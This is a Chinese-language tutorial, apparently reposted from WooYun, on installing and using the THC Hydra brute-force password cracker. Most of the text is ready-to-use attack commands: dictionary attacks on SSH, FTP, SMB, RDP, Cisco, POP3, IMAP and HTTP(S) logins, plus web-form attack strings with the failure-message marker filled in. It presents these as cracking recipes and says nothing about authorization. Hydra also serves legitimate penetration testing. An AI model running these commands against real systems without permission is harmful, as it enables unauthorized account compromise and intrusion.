Hydra使用說明——爆破神器

一、簡介 
hydra是著名***組織thc的一款開源的暴力密碼破解工具，可以在線破解多種密碼。 
官 網：http://www.thc.org/thc-hydra，可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等類型密碼。 

二、安裝 
Hydra 安裝 

# wget --no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz
# tar zxvf hydra-8.1.tar.gz 
# cd hydra-8.1 
# ./configure 
# make && make install 

三、參數說明 

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] 

[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] 

-R 繼續從上一次進度接著破解。 

-S 采用SSL鏈接。 

-s PORT 可通過這個參數指定非默認端口。 

-l LOGIN 指定破解的用戶，對特定用戶破解。 

-L FILE 指定用戶名字典。 

-p PASS 小寫，指定密碼破解，少用，一般是采用密碼字典。 

-P FILE 大寫，指定密碼字典。 

-e ns 可選選項，n：空密碼試探，s：使用指定用戶和密碼試探。 

-C FILE 使用冒號分割格式，例如“登錄名:密碼”來代替-L/-P參數。 

-M FILE 指定目標列表文件一行一條。 

-o FILE 指定結果輸出文件。 

-f 在使用-M參數以后，找到第一對登錄名或者密碼的時候中止破解。 

-t TASKS 同時運行的線程數，默認為16。 

-w TIME 設置最大超時的時間，單位秒，默認是30s。 

-v / -V 顯示詳細過程。 

server 目標ip 

service 指定服務名，支持的服務和協議：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc 
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec 
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere 
teamspeak sip vmauthd firebird ncp afp等等。 

OPT 可選項

四、各種用法實例 ：

1、破解ssh： 
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh 
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh 


2、破解ftp： 
hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV 
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV 


3、get方式提交，破解web登錄： 
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/ 
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php


4、post方式提交，破解web登錄： 
hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" 
（參數說明：-t同時線程數3，-l用戶名是admin，字典pass.txt，保存為out.txt，-f 當破解了一個密碼就停止， 10.36.16.18目標ip，http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中 的內容是表示錯誤猜解的返回信息提示。） 


5、破解https： 
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 



6、破解teamspeak： 
hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak 



7、破解cisco： 
hydra -P pass.txt 10.36.16.18 cisco 
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 



8、破解smb： 
hydra -l administrator -P pass.txt 10.36.16.18 smb 



9、破解pop3： 
hydra -l muts -P pass.txt my.pop3.mail pop3 



10、破解rdp： 
hydra ip rdp -l administrator -P pass.txt -V 



11、破解http-proxy： 
hydra -l admin -P pass.txt http-proxy://10.36.16.18 



12、破解imap： 
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

附上windows版本下載地址：

https://github.com/maaaaz/thc-hydra-windows

文章轉載于wooyun 作者@南哥